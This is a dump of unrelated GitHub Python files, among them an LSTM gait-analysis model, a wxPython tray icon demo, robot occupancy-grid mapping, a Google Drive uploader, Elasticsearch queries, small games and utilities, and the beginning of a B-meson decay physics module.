pl.metrics.classification.ROC(pos_label=1)\n #self.precision_metric = Precision(num_classes=2)\n #self.recall_metric = Recall(num_classes=2)\n #self.prc = pl.metrics.classification.precision_recall_curve(pos_label=1)\n \n \n def forward(self, x):\n # lstm_out = (batch_size, seq_len, hidden_size)\n pack_LSTM_out, hidden = self.lstm(x)\n #print(f\"LSTM out: {len(pack_LSTM_out)} - Hidden: {len(hidden)}\")\n #y_pred = self.linear(lstm_out[:, -1])\n \n out = hidden[0][-1, ...] 
# Get the output of last layer (batch_size, hidden_dim)\n\n out = self.activation(self.fc1(out))\n #out = self.dropout(out)\n out = self.activation(self.fc2(out))\n #out = F.dropout(out, training=self.training)\n out = self.fc3(out)\n\n out = self.sigmoid(out)\n #out = out.view(self.seq_len)\n \n return out\n \n \n def configure_optimizers(self):\n return torch.optim.AdamW(self.parameters(), lr=self.learning_rate)\n\n\n def training_step(self, batch, batch_idx):\n X, y = batch[0][0], batch[1][0]\n \n y_hat = self(X)\n \n loss = self.criterion(y_hat, y)\n accuracy = self.accuracy(y_hat, y)\n \n return {\"loss\": loss, \"train_accuracy\": accuracy}\n\n \n def validation_step(self, batch, batch_idx):\n X, y = batch[0][0], batch[1][0]\n \n y_hat = self(X)\n loss = self.criterion(y_hat, y)\n \n accuracy = self.accuracy(y_hat, y)\n #prec = self.precision_metric(y_hat, y)\n #rec = self.recall_metric(y_hat, y)\n\n return {\"loss\": loss, \"val_accuracy\": accuracy}#, \"val_precision\": prec, \"val_recall\": rec}\n \n \n def test_step(self, batch, batch_idx):\n X, y = batch[0][0], batch[1][0]\n \n y_hat = self(X)\n loss = self.criterion(y_hat, y)\n \n return loss\n \n \n def training_epoch_end(self, train_step_outputs):\n losses = []\n accuracies = []\n \n for i in range(len(train_step_outputs)):\n losses.append(float(np.array(train_step_outputs[i][\"loss\"])))\n accuracies.append(float(np.array(train_step_outputs[i][\"train_accuracy\"]))) \n \n self.log('train_loss', np.mean(losses))\n self.log('train_accuracy', np.mean(accuracies))\n \n \n def validation_epoch_end(self, val_step_outputs):\n losses = []\n accuracies = []\n #precisions = []\n #recalls = []\n \n for i in range(len(val_step_outputs)):\n losses.append(float(np.array(val_step_outputs[i][\"loss\"])))\n accuracies.append(float(np.array(val_step_outputs[i][\"val_accuracy\"]))) \n #precisions.append(float(np.array(val_step_outputs[i][\"val_precision\"]))) \n #recalls.append(float(np.array(val_step_outputs[i][\"val_recall\"]))) \n \n self.log('val_loss', np.mean(losses))\n self.log('val_accuracy', np.mean(accuracies))\n #self.log('val_recall', np.mean(recalls))\n #self.log('val_precision', np.mean(precisions))\n \n \n def test_epoch_end(self, test_step_outputs):\n losses = []\n for loss in test_step_outputs:\n losses.append(float(np.array(loss)))\n \n self.log('test_loss', np.mean(losses))\n \n \n @staticmethod\n def add_model_specific_args(parent_parser):\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\n parser.add_argument('--seq_len', type=int, default=256)\n parser.add_argument('--max_batch_len', type=int, default=6400)\n parser.add_argument('--learning_rate', type=float, default=0.001)\n parser.add_argument('--epochs', type=int, default=5)\n return parser\n ","repo_name":"Mavengence/Representation-Learning-for-Gait-Analysis-in-Parkinson-s-Patients","sub_path":"models/lstm/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"22330624737","text":"import wx\r\n\r\nclass TaskBarIcon(wx.TaskBarIcon):\r\n id_about = wx.NewId()\r\n id_minshow = wx.NewId()\r\n id_maxshow = wx.NewId()\r\n id_closeshow = wx.NewId()\r\n \r\n def __init__(self, frame):\r\n wx.TaskBarIcon.__init__(self)\r\n self.frame = frame\r\n \r\n self.SetIcon(wx.Icon(name=\"secure.ico\", type=wx.BITMAP_TYPE_ICO), \"System demo\")\r\n \r\n self.Bind(wx.EVT_MENU, self.OnAbout, id=self.id_about)\r\n self.Bind(wx.EVT_MENU, 
self.OnMinShow, id=self.id_minshow)\r\n        self.Bind(wx.EVT_MENU, self.OnMaxShow, id=self.id_maxshow)\r\n        self.Bind(wx.EVT_MENU, self.OnCloseShow, id=self.id_closeshow)\r\n        \r\n        self.Bind(wx.EVT_TASKBAR_LEFT_DCLICK, self.OnTaskBarLeftDClick)\r\n        \r\n    def OnTaskBarLeftDClick(self, event):\r\n        if self.frame.IsIconized():\r\n            self.frame.Iconize(False)\r\n        if not self.frame.IsShown():\r\n            self.frame.Show(True)\r\n        \r\n        self.frame.Raise()\r\n        \r\n    def OnAbout(self, event):\r\n        wx.MessageBox(\"This is a wxPython demo.\", \"About\")\r\n        \r\n    def OnMinShow(self, event):\r\n        self.frame.Iconize()\r\n        \r\n    def OnMaxShow(self, event):\r\n        self.OnTaskBarLeftDClick(event)\r\n        self.frame.Maximize(True)\r\n        \r\n    def OnCloseShow(self, event):\r\n        self.frame.Close(True)\r\n        \r\n    def CreatePopupMenu(self):\r\n        menu = wx.Menu()\r\n        menu.Append(self.id_minshow, \"Mini\")\r\n        menu.Append(self.id_maxshow, \"Max\")\r\n        menu.Append(self.id_about, \"About\")\r\n        menu.Append(self.id_closeshow, \"Close\")\r\n        \r\n        return menu\r\n    \r\n\r\nclass MyFrame(wx.Frame):\r\n    def __init__(self, parent, id):\r\n        wx.Frame.__init__(self, parent, id, \"Mini size\", (300,400))\r\n        self.SetIcon(wx.Icon(\"secure.ico\", wx.BITMAP_TYPE_ICO))\r\n        \r\n        panel = wx.Panel(self)\r\n        statictext = wx.StaticText(panel, -1, \"Hello world\", (50,30))\r\n        \r\n        self.taskbaricon = TaskBarIcon(self)\r\n        \r\n        self.Bind(wx.EVT_CLOSE, self.OnClose)\r\n        self.Bind(wx.EVT_ICONIZE, self.OnIconify)\r\n        \r\n    def OnClose(self, event):\r\n        self.taskbaricon.Destroy()\r\n        self.Destroy()\r\n        \r\n    def OnIconify(self, event):\r\n        self.Hide()\r\n        event.Skip()\r\n        \r\nif __name__ == \"__main__\":\r\n    app = wx.App(False) # wx.PySimpleApp() is deprecated\r\n    frame = MyFrame(None, -1)\r\n    frame.Show()\r\n    app.MainLoop()","repo_name":"bspeng922/pyutils","sub_path":"pydemo/src/wxdemo/taskicon.py","file_name":"taskicon.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}
+{"seq_id":"562784276","text":"import numpy as np\nimport math\nfrom scipy.ndimage import gaussian_filter\nfrom math import cos, sin, sqrt\nfrom utils.geometrics_util import bresenham_line\nfrom supervisor.mapping.Mapping import Mapping\nimport time\n\n\nclass OccupancyGridMapping2d(Mapping):\n    def __init__(self, slam, slam_cfg, supervisor_interface, path_planner=None, callback=None):\n        \"\"\"\n        Initialize the OccupancyGridMapping2d object\n        :param slam: The underlying slam algorithm object.\n        :param slam_cfg: The slam configuration.\n        :param path_planner: An object of PathPlanning\n        :param viewer_resolution: viewer resolution, pixels per meter\n        :param callback: callback function\n        \"\"\"\n        self.supervisor = supervisor_interface\n        self.slam = slam\n        self.path_planner = path_planner\n        self.width = slam_cfg['mapping']['gridmap']['width'] # width of the map in meters\n        self.height = slam_cfg['mapping']['gridmap']['height'] # height of the map in meters\n        self.resolution = slam_cfg['mapping']['gridmap'][\n            'resolution'] # resolution of the map, i.e. 
number of grids per meter\n self.W = int(self.width * self.resolution) # width of the map in pixels\n self.H = int(self.height * self.resolution) # height of the map in pixels\n self.offset = (self.width / 2, self.height / 2)\n self.max_range = supervisor_interface.proximity_sensor_max_range()\n\n self.prob_unknown = 0.5 # prior\n self.prob_occ = 0.8 # probability perceptual a grid is occupied\n self.prob_free = 0.2 # probability perceptual a grid is free\n\n self.callback = callback\n self.reset() # initialize the algorithm\n\n def reset(self):\n \"\"\"\n reset the map\n \"\"\"\n self.update_enabled = False\n self.map = np.full((self.H, self.W), self.prob_unknown, dtype=np.float32)\n self.L = self.__prob2log(\n np.full_like(self.map, self.prob_unknown, dtype=np.float32)) # log recursive term of the map\n self.L0 = self.__prob2log(np.full_like(self.map, self.prob_unknown, dtype=np.float32)) # log prior term of the map\n\n self.path = list() # a path calculated by path planner\n self.update_counter = 0\n\n def update(self, z):\n \"\"\"\n Update the occupancy gridmap recursively\n Update the path planning\n :param z: Measurement, represented as tuple of measured distance and measured angle\n \"\"\"\n if not self.update_enabled:\n return\n\n start_time = time.time()\n\n observed_pixs = [] # a list of grid positions and its occupancy probabilities\n lines = self.__calc_lines(z)\n for x0, y0, x1, y1 in lines:\n x0, y0 = self.__to_gridmap_position(x0, y0) # from position in meters to position in pixels\n x1, y1 = self.__to_gridmap_position(x1, y1) # from position in meters to position in pixels\n points = bresenham_line(x0, y0, x1, y1) # a list of points on the line\n occ_probs = self.__inverse_sensor_model(points) # calculate the occupancy probabilities on this line\n observed_pixs += occ_probs\n\n inverse_sensor = np.copy(self.L0) # initialize the inverse-sensor-model term by prior\n\n for xi, yi, prob_occ in observed_pixs:\n if xi < self.W and xi >= 0 and yi < self.H and yi >= 0:\n inverse_sensor[yi, xi] = math.log((prob_occ / (1 - prob_occ)))\n self.L = self.L + inverse_sensor - self.L0 # update the recursive term\n self.L = np.clip(self.L, -5, 5)\n self.update_counter += 1\n\n mapping_time = time.time() - start_time\n start_time = time.time()\n self.__update_path_planning() # update path planning\n path_planning_time = time.time() - start_time\n\n if self.callback is not None:\n self.callback(str(self), mapping_time)\n self.callback(\"A Star planning\", path_planning_time)\n\n def get_path(self):\n \"\"\"\n Get the path from the path planner.\n :return: A list of points on the path. A single item is (x, y) in meters.\n \"\"\"\n if len(self.path) > 1:\n world_path = [self.__to_world_position(xi, yi) for xi, yi in self.path]\n else:\n world_path = list()\n return world_path\n\n def get_map(self):\n \"\"\"\n :return: a 2D numpy.array of the occupied gridmap.\n A single value represents the probability of the occupancy\n \"\"\"\n self.map = self.__log2prob(self.L)\n return self.map\n\n def map_shape(self):\n \"\"\"\n Get map shape\n :return: a tuple of shape, i.e. 
(rows, columns)\n \"\"\"\n return self.map.shape\n\n def __update_path_planning(self):\n occ_threshold = 0.1\n try:\n if self.path_planner is not None and self.update_counter % 5 == 0 and self.update_counter > 5:\n goal = self.supervisor.goal() # get the goal\n start = self.slam.get_estimated_pose().sunpack() # get the estimated pose from slam\n gx, gy = self.__to_gridmap_position(goal[0], goal[1])\n sx, sy = self.__to_gridmap_position(start[0], start[1])\n self.map[sy, sx] = 0\n\n if self.map[gy, gx] < occ_threshold:\n bool_map = self.blur(self.map)\n # bool_map = np.copy(self.map) # calculate a boolean map\n bool_map[bool_map >= occ_threshold] = True\n bool_map[bool_map < occ_threshold] = False\n bool_map = bool_map.astype(np.bool)\n bool_map[sy, sx] = False\n bool_map[gy, gx] = False\n self.path = self.path_planner.execute(sx, sy, gx, gy, bool_map, type='euclidean')\n else:\n self.path = list()\n except IndexError:\n pass\n\n def __inverse_sensor_model(self, points):\n \"\"\"\n Inverse sensor model. Calculate the probability the occupied points on a segment\n :param points: points on a segment in pixels\n :return: A list of occupancy probabilities of the grids on the segment.\n A single item is (x, y, prob) where (x, y) is the prosition of a grid, and prob is the occupancy probability.\n \"\"\"\n a = 0.3 * self.resolution # the thick of the obstacles\n x0, y0 = points[0] # start point position\n xn, yn = points[-1] # end point position, the position of a obstacle\n z_t = sqrt((xn - x0) ** 2 + (yn - y0) ** 2) # the length of the segment, z_t\n z_max = self.max_range * self.resolution\n probs = [] # occupancy probabilities of the grids on the segment.\n for xi, yi in points:\n r = sqrt((xi - x0) ** 2 + (yi - y0) ** 2) # a distance of a cell from the robot\n prob = self.prob_unknown\n if r > min(z_max, z_t + a * 0.5): # return a prior\n prob = self.prob_unknown\n if z_t < z_max and abs(r - z_t) < a * 0.5: # return a occ probability\n prob = self.prob_occ\n if r < z_t:\n prob = self.prob_free\n probs.append((int(xi), int(yi), prob))\n\n return probs\n\n def blur(self, image):\n \"\"\"\n Blur the map\n :return:\n \"\"\"\n return gaussian_filter(image, sigma=2)\n\n def __calc_lines(self, z):\n \"\"\"\n Calculate the start points end end points of segments.\n :param z: Measurement, represented as tuple of measured distance and measured angle\n :return:\n A list of segments. 
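Each segment runs from the robot's current estimated pose to one measured landmark position. 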
A single line is represented by (x0, y0, x1, y1)\n        where (x0, y0) is the position of the start point and (x1, y1) is the position of the end point.\n        \"\"\"\n        pose = self.slam.get_estimated_pose().sunpack()\n        lines = []\n        for measurement in z:\n            lmx, lmy = self.calc_landmark_position(pose, measurement)\n            lines.append((pose[0], pose[1], lmx, lmy))\n        return lines\n\n    def __to_gridmap_position(self, x, y):\n        \"\"\"\n        Calculate the position of a pixel in the grid map\n        :param x: x in meters\n        :param y: y in meters\n        :return:\n            pix_x in pixels\n            pix_y in pixels\n        \"\"\"\n        pix_x = round((x + self.offset[0]) * self.resolution)\n        pix_y = round((y + self.offset[1]) * self.resolution)\n        return int(pix_x), int(pix_y)\n\n    def __to_world_position(self, x, y):\n        \"\"\"\n        Calculate the world position of a pixel in the grid map\n        :param x: x in pixels\n        :param y: y in pixels\n        :return:\n            meter_x in meters\n            meter_y in meters\n        \"\"\"\n        meter_x = x / self.resolution - self.offset[0]\n        meter_y = y / self.resolution - self.offset[1]\n        return meter_x, meter_y\n\n    def __prob2log(self, p):\n        \"\"\"\n        Convert probability to log-odds ratio\n        :param p: probability that a grid is occupied\n        :return: the log-odds value\n        \"\"\"\n        return np.log(p / (1 - p))\n\n    def __log2prob(self, lx):\n        \"\"\"\n        Convert log-odds ratio to probability\n        :param lx: the log-odds ratio\n        :return: probability that a grid is occupied\n        \"\"\"\n        return 1 - 1 / (1 + np.exp(lx))\n\n    @staticmethod\n    def calc_landmark_position(x, z):\n        \"\"\"\n        Returns the measured landmark position\n        :param x: The robot's pose (or combined state vector, only matters that first three elements are robot pose)\n        :param z: Measurement, represented as tuple of measured distance and measured angle\n        :return: Measured landmark position\n        \"\"\"\n        lm = [0, 0]\n        lm[0] = x[0] + z[0] * cos(z[1] + x[2])\n        lm[1] = x[1] + z[0] * sin(z[1] + x[2])\n        return lm\n\n    def __str__(self):\n        return \"OccupancyGridMapping2d\"","repo_name":"yixinglin/sobot-rimulator","sub_path":"supervisor/mapping/OccupancyGridMapping2d.py","file_name":"OccupancyGridMapping2d.py","file_ext":"py","file_size_in_byte":9021,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"}
+{"seq_id":"17885367266","text":"import os\nfrom googleapiclient.discovery import build\nfrom google.oauth2 import service_account\nfrom dotenv import load_dotenv\nimport json\nload_dotenv()\n\n\nclass GoogleDriveUploader:\n    def __init__(self):\n        self.SCOPES = ['https://www.googleapis.com/auth/drive']\n        self.SERVICE_ACCOUNT_JSON = os.getenv('SERVICE_ACCOUNT')\n        self.PARENT_FOLDER_ID = os.getenv('ID')\n\n    def authenticate(self):\n        creds = service_account.Credentials.from_service_account_info(\n            info=json.loads(self.SERVICE_ACCOUNT_JSON), scopes=self.SCOPES)\n        return creds\n\n    def upload_photo(self, file_name, file_path):\n        creds = self.authenticate()\n        service = build('drive', 'v3', credentials=creds)\n\n        file_metadata = {\n            'name': file_name,\n            'parents': [self.PARENT_FOLDER_ID]\n        }\n\n        # request webViewLink explicitly: Drive v3 returns only a few default fields\n        file = service.files().create(\n            body=file_metadata,\n            media_body=file_path,\n            fields='id, webViewLink'\n        ).execute()\n\n        # Retrieve the web view link of the uploaded file\n        web_view_link = file.get('webViewLink')\n\n        return web_view_link\n","repo_name":"cemund/auto-montage","sub_path":"google_drive_upload.py","file_name":"google_drive_upload.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"5446237077","text":"import asyncio\nimport unittest\nfrom 
utilities.find_queue import find_queue\n\n\nclass TestDiceUtils(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.channel_id = -2\n cls.control = [\n ('TestPlayer2', '5'),\n ('TestPlayer1', '3')\n ]\n\n def test_find_queue(self):\n case = asyncio.run(find_queue(self.channel_id))\n self.assertEqual(self.control, case)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"anastasiosmx/Dungeons-and-Discord","sub_path":"tests/tests_on_utilities/test_find_queue.py","file_name":"test_find_queue.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18736792615","text":"from tkinter import ttk\nfrom tkinter import *\nfrom card import Card\nfrom card import Deck\nfrom PIL import Image, ImageTk\nfrom draggable import Draggable\nroot = Tk()\ndnd = Draggable()\n\ndp = Deck(\"Deck\")\nfds = [Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\")]\ntableau = [Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\")]\ncardstoadd = 1\nfor pile in tableau:\n pile.add([dp.deal() for card in range(cardstoadd)])\n cardstoadd += 1\n for card in pile.cards:\n card.visible = False\n pile.cards[0].visible = True\ndp.cards[0].visible = False\nfor card in dp.cards:\n if card.visible:\n print(\"Mistake\")\n\ndef drag(card, fd):\n if len(fd.cards) != 0:\n top = fd.cards[0]\n if top.suit == card.suit and card.value == top.value+1:\n fd.add([card])\n return True\n else:\n if card.value == 1:\n fd.add([card])\n return True\n return False\ncanvas = Canvas(root, height=900, width=1200)\ncanvas.grid()\nempty = PhotoImage(file=\"DeckOfCards\\emptypile.png\")\nempty = empty.subsample(4, 4)\nfor x in range(7):\n canvas.create_image(150 + x * 150, 300 + (len(tableau[x].cards) - x) * 50, image=empty)\n for y in reversed(range(x+1)):\n\n # if tableau[x].cards[y].visible:\n tableau[x].cards[y].image()\n canvas.create_image(150+x*150, 300+(len(tableau[x].cards)-y)*50, image=tableau[x].cards[y].image)\n # root.after(1000)\ncanvas.create_image(150, 100, image=empty)\nfor card in reversed(dp.cards):\n card.image()\n canvas.create_image(150, 100, image = card.image)\nfor x in range(5):\n canvas.create_image(300+x*150, 100, image=empty)\n# cardholder = Label(canvas, image=tableau[0].cards[0].image)\n# cardholder.pack()\n# cardholder.place(x=150, y=300)\n# dnd.add_draggable(cardholder)\ncanvas.move(tableau[0].cards[0].image, 0, 200)\nroot.mainloop()\n","repo_name":"CantChooseThis/Solitaire","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37227898344","text":"from elasticsearch import Elasticsearch \r\n\r\n\r\nes=Elasticsearch([{'host':'localhost','port':9200}])\r\n\r\nq4 = {'query':{'match':{'first_name':'abhay'}}}\r\n\r\nq5 = {'query':{'bool':{'must':[{'match':{'first_name':'abhay'}}]}}}\r\n\r\nq6 = {\r\n 'query':{\r\n 'bool':{\r\n 'must':{\r\n 'match':{\r\n 'first_name':'abhay'\r\n }\r\n },\r\n \"filter\":{\r\n \"range\":{\r\n \"age\":{\r\n \"gt\":25\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n\r\nq7 = {\r\n 'query':{\r\n 'match':{\r\n \"about\":\"play cricket\"\r\n }\r\n }\r\n }\r\n\r\nq8 = {\r\n 'query':{\r\n 'match_phrase':{\r\n \"about\":\"play cricket\"\r\n }\r\n }\r\n }\r\nq9 = {\r\n \"aggs\": {\r\n \"all_interests\": {\r\n \"terms\": { \"field\": \"interests.keyword\" }\r\n }\r\n }\r\n}\r\n\r\nq10 = {\r\n 
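# note: multi_match runs one query string against several fields at once\r\n    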
\"query\":{\r\n \"multi_match\" : {\r\n \"query\": \"paprola\",\r\n \"fields\": [ \"city\", \"state\" ]\r\n }\r\n }\r\n}\r\nq11 = {\"query\":{\r\n \"query_string\":{\r\n \"query\":\"play\"\r\n }\r\n }\r\n}\r\n\r\nq12 = {\r\n \"query\":{\r\n \"term\":{\"zip\":\"176115\"}\r\n \t\t\t}\r\n\t}\r\n\r\n\r\ndef search_queries(query_dic,index):\r\n\toutput = es.search(index=index,body=query_dic)\r\n\tfor hit in output['hits']['hits']:\r\n\t\tresult = hit['_source']\r\n\tprint('result = ',result)\r\n\tprint('******************************************')\r\n\r\n\r\n\r\n\r\noutput1=es.get(index='company',id=3)\r\nprint('dic of employee with id 3',output1)\r\nprint('source_dict/actaul_doc',output1['_source'])\r\n# outut2=es.delete(index='company',id=2)\r\nprint('******************************************')\r\noutput4= es.search(index='company',body=q4)\r\nprint('doc with first name matching: ',output4['hits']['hits'])\r\nprint('******************************************')\r\noutput5= es.search(index='company',body=(q5))\r\nprint(\"boll_search: \",output5['hits']['hits'])\r\nprint('******************************************')\r\noutput6 = es.search(index='company',body=(q6))\r\nprint(\"search with filter: \",output6['hits']['hits'])\r\nprint('******************************************')\r\noutput7= es.search(index='company',body=(q7))\r\nprint(\"full text search: \")\r\nfor hit in output7['hits']['hits']:\r\n print(hit['_source']['about']) \r\n print(hit['_score'])\r\n print('**********************')\r\n\r\n\r\n\r\n\r\n\r\n\r\nsearch_queries(q8,'company')\r\nsearch_queries(q9,'company')\r\nsearch_queries(q10,'company')\r\nsearch_queries(q11,'company')\r\nsearch_queries(q12,'company')\r\n\r\n","repo_name":"prerna7982-code/demo-projects","sub_path":"elastic_search_queries.py","file_name":"elastic_search_queries.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12253169099","text":"def QuadTree(data, n):\r\n m = n // 2\r\n if n == 1:\r\n return data[0][0]\r\n countzero = 0\r\n\r\n for i in range(n):\r\n countzero += data[i].count('0')\r\n\r\n if countzero == n * n:\r\n return '0'\r\n elif countzero == 0:\r\n return '1'\r\n quad1 = list(map(lambda x: x[:m], data[:m]))\r\n quad2 = list(map(lambda x: x[m:], data[:m]))\r\n quad3 = list(map(lambda x: x[:m], data[m:]))\r\n quad4 = list(map(lambda x: x[m:], data[m:]))\r\n return '(' + QuadTree(quad1, m) + QuadTree(quad2, m) + QuadTree(quad3, m) + QuadTree(quad4, m) + ')'\r\n\r\n\r\nN = int(input())\r\n\r\ndata_input = [list(input()) for _ in range(N)]\r\n\r\nans = QuadTree(data_input, N)\r\n\r\nprint(ans)\r\n","repo_name":"cocosasa/Beakjoon-muscle","sub_path":"백준/Silver/1992. 
쿼드트리/쿼드트리.py","file_name":"쿼드트리.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35320519065","text":"class TablaHash:\n def __init__(self):\n self.tabla = {}\n\n def agregar_elemento(self, clave, valor):\n self.tabla[clave] = valor\n\n def obtener_elemento(self, clave):\n return self.tabla.get(clave)\n\n def obtener_tamanio(self):\n return len(self.tabla)\n\n def obtener_cadena(self):\n return str(self.tabla)\n\n\nclass Encriptador:\n def __init__(self):\n self.tabla_encriptacion = TablaHash()\n self.tabla_desencriptacion = TablaHash()\n self.generar_tablas_hash()\n\n def generar_tablas_hash(self):\n matriz_hash = [[0 for i in range(8)] for j in range(94)]\n for i in range(32, 126):\n for j in range(8):\n matriz_hash[i-32][j] = (i+j) % 94\n for i in range(94):\n cadena = \"\"\n for j in range(8):\n cadena += chr(matriz_hash[i][j] + 32)\n caracter = chr(i+32)\n self.tabla_encriptacion.agregar_elemento(caracter, cadena)\n self.tabla_desencriptacion.agregar_elemento(cadena, caracter)\n\n def encriptar(self, mensaje):\n mensaje_encriptado = \"\"\n for caracter in mensaje:\n cadena = self.tabla_encriptacion.obtener_elemento(caracter)\n if cadena is not None:\n mensaje_encriptado += cadena\n return mensaje_encriptado\n\n def desencriptar(self, mensaje_encriptado):\n mensaje = \"\"\n for i in range(0, len(mensaje_encriptado), 8):\n cadena = mensaje_encriptado[i:i+8]\n caracter = self.tabla_desencriptacion.obtener_elemento(cadena)\n if caracter is not None:\n mensaje += caracter\n return mensaje\n\n\n# Ejemplo de uso\nencriptador = Encriptador()\nmensaje_original = \"Hola, Rebelión!\"\nmensaje_encriptado = encriptador.encriptar(mensaje_original)\nmensaje_desencriptado = encriptador.desencriptar(mensaje_encriptado)\nprint(\"Mensaje original:\", mensaje_original)\nprint(\"Mensaje encriptado:\", mensaje_encriptado)\nprint(\"Mensaje desencriptado:\", mensaje_desencriptado)\n","repo_name":"oliviaclemente/-Parcial22_23_Olivia_Clemente","sub_path":"ej5/ej5.py","file_name":"ej5.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18929291706","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nf = open(\"Trinn1.txt\", \"r\")\r\nline1 = f.readline()\r\n\r\nfreq = []\r\ngain = [] \r\nphase = []\r\n\r\nline = f.readline().strip('\\n')\r\n\r\nwhile line !=\"\":\r\n data1, data2 = line.split()\r\n freq.append(round(float(data1), 4))\r\n gainRaw, phaseRaw = data2.split(\",\")\r\n gain.append(round(float(gainRaw.strip(\"(dB\")), 4))\r\n phase.append(round(float(phaseRaw.strip(\")°\")), 4))\r\n line = f.readline()\r\n\r\n#Finding the -3 dB value and finding the value nearest this value in the list.\r\nabsolute_difference_function = lambda list_value : abs(list_value - (max(gain)-3))\r\nclosest_value = min(gain, key=absolute_difference_function)\r\npeak_dB_LTSpice = max(gain)\r\nfreq_comment = str(freq[gain.index(closest_value)]) \r\nx_coord_LTSpice = freq[gain.index(closest_value)]\r\ny_coord_LTSpice = gain[gain.index(closest_value)]\r\n\r\n#dB plot\r\nplt.figure()\r\nplt.subplot(211)\r\nplt.semilogx(freq, gain)\r\n\r\n#Comment out these to remove the point, annotation and legend.\r\nplt.scatter(x_coord_LTSpice, y_coord_LTSpice, color = 'red')\r\nplt.annotate('-3dB at {}Hz'.format(freq_comment), (x_coord_LTSpice, y_coord_LTSpice))\r\nplt.legend(['Peak value {}dB'.format(peak_dB_LTSpice)], loc 
=\"lower left\") #Use this to change the location\r\n\r\nplt.ylabel('dB Mag.')\r\nplt.grid()\r\n\r\n#Phaseplot\r\nplt.subplot(212)\r\nplt.semilogx(freq, phase)\r\nplt.xlabel('Freq. (Hz)')\r\nplt.ylabel('Phase (deg.)')\r\nplt.grid()\r\nplt.show()\r\n","repo_name":"WilliamHaugerud/LTSpice-BodePlotGrapher","sub_path":"LTSpiceBodePlotter.py","file_name":"LTSpiceBodePlotter.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35969750375","text":"import datetime\nimport json\nimport subprocess\nfrom functools import reduce\n\nfrom models import VirtualMachine, Tag, FirewallRule, create_tables, tables_exist, ServerProcess\n\nBATCH_SIZE = 999\n\n\ndef populate_data(file_name):\n with open(file_name) as json_file:\n data = json.load(json_file)\n\n vms = data['vms']\n fw_rules = data['fw_rules']\n\n vm_tags = reduce(lambda tags, v: tags + v['tags'], vms, [])\n fw_tags = reduce(lambda tags, fwr: tags + [fwr['source_tag'], fwr['dest_tag']], fw_rules, [])\n tag_objs = [Tag(tag=t) for t in list(set(vm_tags + fw_tags))]\n Tag.bulk_create(tag_objs, batch_size=BATCH_SIZE)\n\n for vm in vms:\n vm_obj = VirtualMachine.create(vm_id=vm['vm_id'], name=vm['name'])\n vm_obj.tags.add(Tag.select().where(Tag.tag.in_(vm['tags'])))\n\n fw_objs = [FirewallRule(fw_id=fw['fw_id'],\n source_tag=Tag.get(tag=fw['source_tag']),\n dest_tag=Tag.get(tag=fw['dest_tag']))\n for fw in fw_rules]\n FirewallRule.bulk_create(fw_objs, batch_size=BATCH_SIZE)\n\n\ndef setup():\n if not tables_exist():\n create_tables()\n populate_data('init_data.json')\n\n\ndef runserver():\n ServerProcess.create(start_time=datetime.datetime.now())\n bash_command = \"\"\"gunicorn app\"\"\"\n process = subprocess.Popen(bash_command.split(), stdout=subprocess.PIPE)\n output, error = process.communicate()\n\n\ndef main():\n setup()\n runserver()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ngoodman90/attack_surface","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30268862963","text":"r\"\"\"Functions for exclusive $B\\to V\\ell\\nu$ decays.\"\"\"\n\nfrom math import sqrt, pi, cos, sin\nimport flavio\nfrom flavio.physics.bdecays.common import lambda_K, meson_quark, meson_ff\nfrom flavio.physics.bdecays.wilsoncoefficients import wctot_dict\nfrom flavio.physics import ckm\nfrom flavio.classes import AuxiliaryQuantity\nfrom flavio.config import config\nfrom flavio.physics.running import running\nfrom flavio.physics.bdecays import angular\nfrom flavio.physics.bdecays.wilsoncoefficients import get_wceff_fccc\nfrom flavio.classes import Observable, Prediction\n\ndef get_ff(q2, par, B, V):\n \"\"\"Return the form factors\"\"\"\n ff_name = meson_ff[(B,V)] + ' form factor'\n return AuxiliaryQuantity[ff_name].prediction(par_dict=par, wc_obj=None, q2=q2)\n\ndef prefactor(q2, par, B, V, lep):\n \"\"\"Return the prefactor including constants and CKM elements\"\"\"\n GF = par['GF']\n scale = config['renormalization scale']['bvll']\n ml = par['m_'+lep]\n mB = par['m_'+B]\n mV = par['m_'+V]\n tauB = par['tau_'+B]\n laB = lambda_K(mB**2, mV**2, q2)\n laGa = lambda_K(q2, ml**2, 0.)\n qi_qj = meson_quark[(B, V)]\n if qi_qj == 'bu':\n Vij = ckm.get_ckm(par)[0,2] # V_{ub} for b->u transitions\n if qi_qj == 'bc':\n Vij = ckm.get_ckm(par)[1,2] # 